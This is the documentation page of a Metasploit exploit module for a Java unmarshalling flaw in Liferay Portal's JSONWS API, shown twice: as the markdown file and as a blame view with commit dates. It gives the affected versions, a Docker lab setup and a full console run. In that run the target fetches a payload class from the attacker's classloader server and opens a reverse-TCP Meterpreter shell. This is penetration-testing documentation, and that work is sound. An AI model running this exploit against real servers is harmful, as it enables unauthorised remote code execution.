documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md

## Vulnerable Application

### Description

This module exploits a Java unmarshalling vulnerability via JSONWS in
Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2
to execute code as the Liferay user.

### Setup

Run `docker run -it -p 8080:8080 liferay/portal:7.2.0-ga1` (note the
added `7.2.0-ga1` tag) as per Liferay's [Docker Hub instructions](https://hub.docker.com/r/liferay/portal).

### Targets

```
Id  Name
--  ----
0   Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2
```

## Verification Steps

Follow [Setup](#setup) and [Scenarios](#scenarios).

## Options

### SRVPORT

If you are testing the [Docker container](#setup), which binds to port
8080 by default, set this to a different port to bind the remote
classloading server to.

## Scenarios

### Liferay Portal 7.2.0 GA1 from [Docker Hub](https://hub.docker.com/r/liferay/portal)

```
msf5 > use exploit/multi/http/liferay_java_unmarshalling
msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing

Module options (exploit/multi/http/liferay_java_unmarshalling):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)

msf5 exploit(multi/http/liferay_java_unmarshalling) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(multi/http/liferay_java_unmarshalling) > set lhost 192.168.1.3
lhost => 192.168.1.3
msf5 exploit(multi/http/liferay_java_unmarshalling) > set srvport 8888
srvport => 8888
msf5 exploit(multi/http/liferay_java_unmarshalling) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.
[*] Using URL: http://0.0.0.0:8888/
[*] Local IP: http://192.168.1.3:8888/
[+] Started remote classloader server at http://192.168.1.3:8888/
[*] Unmarshalling remote classloader at http://127.0.0.1:8080/api/jsonws/expandocolumn/update-column
[*] GET /Uphxohekruuokpedknflsriuafhrdsfk.class requested
[+] Sending constructor class
[*] GET /metasploit/Payload.class requested
[+] Sending payload class
[*] HEAD /metasploit.dat requested
[+] Sending 200
[*] GET /metasploit.dat requested
[+] Sending payload config
[*] HEAD /metasploit/Payload.class requested
[+] Sending 200
[*] GET /metasploit/Payload.class requested
[+] Sending payload class
[*] Sending stage (53928 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:58271) at 2020-04-08 07:05:47 -0500
[*] Server stopped.

meterpreter > getuid
Server username: liferay
meterpreter > sysinfo
Computer    : 588a96d744cb
OS          : Linux 4.19.76-linuxkit (amd64)
Meterpreter : java/linux
meterpreter >
```
Add module doc 2020-04-08 18:20:25 -05:00			`## Vulnerable Application`

			`### Description`

			`This module exploits a Java unmarshalling vulnerability via JSONWS in`
Refactor check for precision 2020-04-09 11:01:24 -05:00			`Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2`
			`to execute code as the Liferay user.`
Add module doc 2020-04-08 18:20:25 -05:00
			`### Setup`

			Run `docker run -it -p 8080:8080 liferay/portal:7.2.0-ga1` (note the
			added `7.2.0-ga1` tag) as per Liferay's [Docker Hub instructions](https://hub.docker.com/r/liferay/portal).

			`### Targets`

			```
			`Id Name`
			`-- ----`
Refactor check for precision 2020-04-09 11:01:24 -05:00			`0 Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2`
Add module doc 2020-04-08 18:20:25 -05:00			```

			`## Verification Steps`

			`Follow [Setup](#setup) and [Scenarios](#scenarios).`

			`## Options`

			`### SRVPORT`

			`If you are testing the [Docker container](#setup), which binds to port`
			`8080 by default, set this to a different port to bind the remote`
			`classloading server to.`

			`## Scenarios`

			`### Liferay Portal 7.2.0 GA1 from [Docker Hub](https://hub.docker.com/r/liferay/portal)`

			```
			`msf5 > use exploit/multi/http/liferay_java_unmarshalling`
			`msf5 exploit(multi/http/liferay_java_unmarshalling) > show missing`

			`Module options (exploit/multi/http/liferay_java_unmarshalling):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'`


			`Payload options (java/meterpreter/reverse_tcp):`

			`Name Current Setting Required Description`
			`---- --------------- -------- -----------`
			`LHOST yes The listen address (an interface may be specified)`

			`msf5 exploit(multi/http/liferay_java_unmarshalling) > set rhosts 127.0.0.1`
			`rhosts => 127.0.0.1`
			`msf5 exploit(multi/http/liferay_java_unmarshalling) > set lhost 192.168.1.3`
			`lhost => 192.168.1.3`
			`msf5 exploit(multi/http/liferay_java_unmarshalling) > set srvport 8888`
			`srvport => 8888`
			`msf5 exploit(multi/http/liferay_java_unmarshalling) > run`

			`[*] Started reverse TCP handler on 192.168.1.3:4444`
			`[*] Executing automatic check (disable AutoCheck to override)`
			`[+] The target appears to be vulnerable. Liferay 7.2.0 CE GA1 MAY be a vulnerable version. Please verify.`
			`[*] Using URL: http://0.0.0.0:8888/`
			`[*] Local IP: http://192.168.1.3:8888/`
Be more verbose and validate classloader server 2020-04-13 15:18:02 -05:00			`[+] Started remote classloader server at http://192.168.1.3:8888/`
			`[*] Unmarshalling remote classloader at http://127.0.0.1:8080/api/jsonws/expandocolumn/update-column`
Add module doc 2020-04-08 18:20:25 -05:00			`[*] GET /Uphxohekruuokpedknflsriuafhrdsfk.class requested`
Rename exploit_class to constructor_class 2020-04-10 02:13:46 -05:00			`[+] Sending constructor class`
Add module doc 2020-04-08 18:20:25 -05:00			`[*] GET /metasploit/Payload.class requested`
			`[+] Sending payload class`
			`[*] HEAD /metasploit.dat requested`
			`[+] Sending 200`
			`[*] GET /metasploit.dat requested`
			`[+] Sending payload config`
			`[*] HEAD /metasploit/Payload.class requested`
			`[+] Sending 200`
			`[*] GET /metasploit/Payload.class requested`
			`[+] Sending payload class`
			`[*] Sending stage (53928 bytes) to 192.168.1.3`
			`[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:58271) at 2020-04-08 07:05:47 -0500`
			`[*] Server stopped.`

			`meterpreter > getuid`
			`Server username: liferay`
			`meterpreter > sysinfo`
			`Computer : 588a96d744cb`
			`OS : Linux 4.19.76-linuxkit (amd64)`
			`Meterpreter : java/linux`
			`meterpreter >`
			```